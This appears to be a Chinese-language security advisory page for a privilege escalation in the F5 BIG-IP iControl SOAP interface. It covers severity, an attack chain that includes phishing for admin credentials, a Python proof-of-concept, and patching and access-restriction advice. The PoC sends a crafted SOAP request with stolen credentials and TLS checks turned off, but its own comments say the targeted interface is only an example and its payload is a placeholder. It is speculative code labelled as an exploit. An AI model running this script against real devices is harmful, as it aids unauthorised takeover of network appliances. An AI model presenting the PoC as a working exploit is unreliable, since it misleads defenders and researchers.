CVE-2026-40631 F5 BIG-IP iControl SOAP权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-40631

漏洞类型

权限提升

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

F5 BIG-IP产品中存在一个权限提升漏洞。拥有资源管理员或管理员角色的经过身份验证的攻击者，可以通过iControl SOAP接口修改配置对象。成功利用该漏洞可能导致攻击者权限提升，从而影响系统机密性和完整性。请注意，已达到技术支持终止（EoTS）的软件版本未包含在评估范围内。

技术细节

该漏洞主要影响F5 BIG-IP设备的iControl SOAP接口。iControl SOAP是基于XML的API，旨在允许管理员通过编程方式管理设备配置。漏洞的根本原因在于该接口在处理特定配置对象的修改请求时，未能严格执行角色权限边界。攻击者需要先获得Resource Administrator或Administrator角色的高权限账户凭证（PR:H）。一旦获得访问权限，攻击者可以构造恶意的SOAP请求，发送至iControl端点。该请求利用逻辑缺陷，修改本应受到保护的系统级配置对象。由于CVSS向量包含S:C（Scope Changed），这种配置变更可能导致攻击者突破原有的管理域限制，将权限提升至最高级别，从而完全控制受影响的F5设备。

攻击链分析

STEP 1

侦察

攻击者识别目标网络中的F5 BIG-IP设备，并确定其运行版本未达到EoTS。

STEP 2

获取凭据

攻击者通过钓鱼、社会工程学或其他漏洞获取具有Resource Administrator或Administrator角色的有效凭证（PR:H）。

STEP 3

利用漏洞

攻击者使用获取的凭证，向iControl SOAP接口发送特制的SOAP请求，试图修改配置对象。

STEP 4

权限提升

由于漏洞存在，服务器处理请求后错误地修改了关键配置，导致攻击者获得超出预期的系统权限（S:C）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-40631: F5 BIG-IP iControl SOAP Privilege Escalation
# Note: This requires valid high-privileged credentials (Resource Admin or Admin)

import requests
import sys

# Disable SSL warnings for self-signed certificates (common in F5 setups)
requests.packages.urllib3.disable_warnings()

def exploit(target_ip, username, password):
    # The iControl SOAP endpoint
    url = f"https://{target_ip}/iControl/iControlPortal.cgi"

    # SOAP Headers
    headers = {
        'Content-Type': 'text/xml; charset=utf-8',
        'SOAPAction': 'urn:iControl:Management/DeviceGroup' # Example interface, actual target may vary
    }

    # Vulnerable SOAP Payload attempting to modify a config object
    # The specific object and method depend on the exact vulnerability in K000160979
    payload = """<?xml version="1.0" encoding="UTF-8"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                       xmlns:ns1="urn:iControl:Management/DeviceGroup">
        <SOAP-ENV:Body>
            <ns1:set_member_device>
                <!-- Malicious configuration modification logic -->
                <device_names>
                    <item>attacker_controlled_device</item>
                </device_names>
            </ns1:set_member_device>
        </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>"""

    try:
        response = requests.post(url, data=payload, headers=headers, auth=(username, password), verify=False, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if configuration was modified or privileges escalated.")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

F5 BIG-IP (具体受影响版本请参考官方公告 K000160979)

防御指南

临时缓解措施

建议立即检查F5 BIG-IP系统的版本，并应用官方提供的补丁。如果无法立即升级，应严格限制对iControl SOAP接口的网络访问，仅允许受信任的管理主机连接，并加强对高权限账户的监控，防止凭证被窃取。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40631
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40631
3 Details https://www.cvedetails.com/cve/CVE-2026-40631/
4 VulDB https://vuldb.com/cve/CVE-2026-40631
5 Link https://my.f5.com/manage/s/article/K000160979